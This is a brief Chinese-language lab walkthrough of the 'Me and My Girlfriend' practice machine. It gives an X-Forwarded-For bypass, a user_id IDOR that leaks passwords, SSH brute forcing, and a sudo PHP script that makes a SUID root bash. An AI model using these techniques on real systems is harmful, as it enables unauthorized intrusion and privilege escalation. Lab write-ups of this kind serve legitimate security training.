跳转至

Me and My Girlfriend

知识整理
HTTP请求头
水平越权
密码复用
sudo提权

usershell

目标IP:192.168.205.144

服务探测:

22/tcp open  ssh
80/tcp open  http

目录探测并未发现什么有用的信息

image-20231020134721745

携带请求头X-Forwarded-For: 127.0.0.1,访问到登陆页面,经过测试,最后在

index.php?page=profile&user_id=1发现水平越权,可以查看用户名和密码

遍历一下,user_id在1~5的五个用户,作为密码字典去爆破SSH

[22][ssh] host: 192.168.205.144   login: alice   password: 4lic3

SSH连接,拿到user权限

rootshell

sudo -l

(root) NOPASSWD: /usr/bin/php

可以利用php提权

exp.php:

<?php 
    system("cp /bin/bash /tmp/rootbash");
    system("chmod +xs /tmp/rootbash");

sudo /usr/bin/php exp.php

/tmp/rootbash -p

拿到root权限